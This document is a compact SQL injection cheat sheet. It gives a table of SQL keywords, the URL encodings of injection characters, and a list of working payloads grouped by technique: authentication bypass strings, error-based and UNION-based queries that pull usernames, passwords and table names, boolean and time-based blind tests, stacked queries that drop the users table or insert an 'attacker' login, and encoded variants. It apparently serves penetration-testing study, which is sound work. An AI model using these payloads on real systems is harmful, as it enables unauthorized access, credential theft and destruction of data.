
--- SQL Injection ---

• Data Queries
• SQL injection Characters
• Common SQL Injection Payload Examples


-- Data Queries --

| SQL Keyword         | Description                                                                  |
|---------------------|------------------------------------------------------------------------------|
| SELECT              | Retrieve data from a database table                                          |
| FROM                | Specifies the table to retrieve data from                                    |
| WHERE               | Filter records based on conditions                                           |
| ORDER BY            | Sort the results (ascending or descending)                                   |
| GROUP BY            | Group rows with identical values into summaries                              |
| INSERT INTO         | Adds new rows of data into a table                                           |
| UPDATE              | Modifies existing data in a table                                            |
| DELETE              | Removes existing rows from a table                                           |
| DROP                | Deletes a table or database from the system                                  |
| JOIN                | Combines rows from two or more tables based on a column                      |
| INNER JOIN          | Returns records that have matching values in multiple tables                 |
| UNION               | Combines the results of two or more SELECT statements                        |
| LIKE                | Searches for a specified pattern in a column                                 |
| IN                  | Checks if a value matches any value in a list or query                       | 


-- SQL injection Characters --

| Character       | Normal Character | URL-Encoded Character  |
|---------------- |------------------|------------------------|
| Single Quote    | `'`              | `%27`                  |
| Double Quote    | `"`              | `%22`                  |
| Space           | (space)          | `%20`                  |
| Semicolon       | `;`              | `%3B`                  |
| Dash            | `-`              | `%2D`                  |


-- Common SQL Injection Payload Examples --

🔸 Basic authentication bypass

' OR '1'='1
' OR 1=1 --
' OR 'a'='a
admin' --

🔸 Error-based injection

1' AND 1=CONVERT(int, (SELECT @@version))--
1' AND 1=CAST((SELECT user()) AS INT)--

🔸 UNION-based injection

' UNION SELECT null, username, password FROM users --
' UNION SELECT 1, table_name, null FROM information_schema.tables --

🔸 Boolean-based blind injection

1' AND 1=1 --     (true)
1' AND 1=2 --     (false)

🔸 Time-based blind injection (MySQL)

1' AND SLEEP(5) --
' OR IF(1=1, SLEEP(5), 0) --

🔸 Stacked queries (if supported)

1'; DROP TABLE users; --
1'; INSERT INTO logins VALUES ('attacker', 'pw'); --

🔸 Encoded/obfuscated

?id=1%27%20OR%20%271%27=%271%27--      (URL encoded)
?id=0x31 OR 0x31=0x31 --               (Hex encoded)



https://gchq.github.io/CyberChef/
https://www.w3schools.com/tags/ref_urlencode.ASP
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection


